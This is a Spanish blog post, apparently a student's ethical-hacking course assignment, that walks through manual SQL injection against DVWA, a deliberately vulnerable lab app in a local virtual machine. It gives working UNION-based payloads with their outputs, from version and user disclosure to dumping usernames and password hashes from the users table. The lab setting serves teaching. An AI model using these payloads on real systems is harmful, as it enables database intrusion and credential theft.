Hacking Ético, Unidad 2 - Tarea 2: SQL injection

Para la segunda tarea de la unidad 2, inyección SQL necesitaremos descargar una maquina virtual de VirtualBox. El archivo está comprimido en 7-zip y el tamaño es de (380MB) dvwa-moocHackingMU-actualizada.7z

Una vez descargada y arrancada la maquina virtual, debería de aparecer una pantalla similar.

Maquina virtual funcionando
Para conectarnos a la maquina virtual desde el navegador, nos fijaremos en la IP asignada y accederemos mediante el siguiente enlace http://192.168.56.101/login.php
Pantalla login DVWA
Una vez que hayamos entrado, seguiremos los pasos 7, 8 y 9 de la lección 6 del manual de inyección SQL.

Paso 7. 

Los datos de acceso son: Username: admin Password: password

Paso 8.

Consiste en cambiar el nivel de seguridad "DVWA Security" de high a low y hacer click en "Submit".

 
DVWA Security
Paso 9.

Inyección manual SQL "SQL Injection"

SQL Injection
Modos básicos de inyección SQL.

Ejemplo 1, escribir un 1 en "User ID:" y "Submit"

Resultado de escribir 1
El resultado obtenido, es una sentencia sql.

$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

Ejemplo 2, siempre será True  %' or '0'='0


La intención de esta sentencia es, visualizar todo lo que sea falso o verdadero.

%' probablemente no será igual a nada y el resultado será falso.

'0'='0 Es igual a verdadero, porque 0 siempre será igual a 0

Sentencia sql.
mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';

Resultado sentencia %' or '0'='0
Ejemplo 3, versión base de datos. %' or 0=0 union select null, version() #

ID: %' or 0=0 union select null, version() #
First name: admin
Surname: admin

ID: %' or 0=0 union select null, version() #
First name: Gordon
Surname: Brown

ID: %' or 0=0 union select null, version() #
First name: Hack
Surname: Me

ID: %' or 0=0 union select null, version() #
First name: Pablo
Surname: Picasso

ID: %' or 0=0 union select null, version() #
First name: Bob
Surname: Smith

ID: %' or 0=0 union select null, version() #
First name: 
Surname: 5.5.44-0+deb8u1

En el campo surname, aparece la versión de la base de datos mysql 5.5.44-0+deb8u1

Ejemplo 4, usuario base de datos. %' or 0=0 union select null, user() #

ID: %' or 0=0 union select null, user() #
First name: admin
Surname: admin

ID: %' or 0=0 union select null, user() #
First name: Gordon
Surname: Brown

ID: %' or 0=0 union select null, user() #
First name: Hack
Surname: Me

ID: %' or 0=0 union select null, user() #
First name: Pablo
Surname: Picasso

ID: %' or 0=0 union select null, user() #
First name: Bob
Surname: Smith

ID: %' or 0=0 union select null, user() #
First name: 
Surname: dvwa@localhost

de igual manera que se podía visualizar la versión de la base de datos, también se visualiza el nombre de usuario dvwa@localhost que ejecuta el código PHP.

Ejemplo 5, nombre de la base de datos. %' or 0=0 union select null, database() #

ID: %' or 0=0 union select null, database() #
First name: admin
Surname: admin

ID: %' or 0=0 union select null, database() #
First name: Gordon
Surname: Brown

ID: %' or 0=0 union select null, database() #
First name: Hack
Surname: Me

ID: %' or 0=0 union select null, database() #
First name: Pablo
Surname: Picasso

ID: %' or 0=0 union select null, database() #
First name: Bob
Surname: Smith

ID: %' or 0=0 union select null, database() #
First name: 
Surname: dvwa

El nombre de la base de datos es dvwa

Ejemplo 6, visualizar todas las tablas de information_schema

%' and 1=0 union select null, table_name from information_schema.tables #

Información de todas las tablas de information_schema

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: CHARACTER_SETS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: COLLATIONS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: COLLATION_CHARACTER_SET_APPLICABILITY

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: COLUMNS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: COLUMN_PRIVILEGES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: ENGINES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: EVENTS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: FILES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: GLOBAL_STATUS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: GLOBAL_VARIABLES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: KEY_COLUMN_USAGE

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: PARAMETERS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: PARTITIONS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: PLUGINS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: PROCESSLIST

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: PROFILING

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: REFERENTIAL_CONSTRAINTS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: ROUTINES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: SCHEMATA

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: SCHEMA_PRIVILEGES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: SESSION_STATUS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: SESSION_VARIABLES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: STATISTICS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: TABLES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: TABLESPACES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: TABLE_CONSTRAINTS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: TABLE_PRIVILEGES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: TRIGGERS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: USER_PRIVILEGES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: VIEWS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_BUFFER_PAGE

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_TRX

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_BUFFER_POOL_STATS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_LOCK_WAITS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_CMPMEM

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_CMP

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_LOCKS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_CMPMEM_RESET

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_CMP_RESET

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_BUFFER_PAGE_LRU

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: guestbook

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: users 

Ejemplo 7, visualizar todas la tablas que tengan el prefijo "User", en la tabla users se encuentran los passwords.

Setencia SQL %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#

Información de todas las tablas que tengan prefijo "User"

ID: %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
First name: 
Surname: USER_PRIVILEGES

ID: %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
First name: 
Surname: users

Ejemplo 8, visualizar todos los campos de columna de information_schema tabla user

Sentencia sql:  %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #

Información de la tabla user, se identifican los siguientes campos: user_id, first_name, last_name, user, password, avatar

ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
First name: 
Surname: users
user_id

ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
First name: 
Surname: users
first_name

ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
First name: 
Surname: users
last_name

ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
First name: 
Surname: users
user

ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
First name: 
Surname: users
password

ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
First name: 
Surname: users
avatar

Ejemplo 9, visualizar el contenido de information_schema tabla user

la sentencia sql

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

Resultado de la consulta sql, aparece el contenido de todos los campos incluido el password.

ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
First name: 
Surname: admin
admin
admin
5f4dcc3b5aa765d61d8327deb882cf99

ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
First name: 
Surname: Gordon
Brown
gordonb
e99a18c428cb38d5f260853678922e03

ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
First name: 
Surname: Hack
Me
1337
8d3533d75ae2c3966d7e0d4fcc69216b

ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
First name: 
Surname: Pablo
Picasso
pablo
0d107d09f5bbe40cade3de5c71e9e9b7

ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
First name: 
Surname: Bob
Smith
smithy
5f4dcc3b5aa765d61d8327deb882cf99

0 comentarios:

Publicar un comentario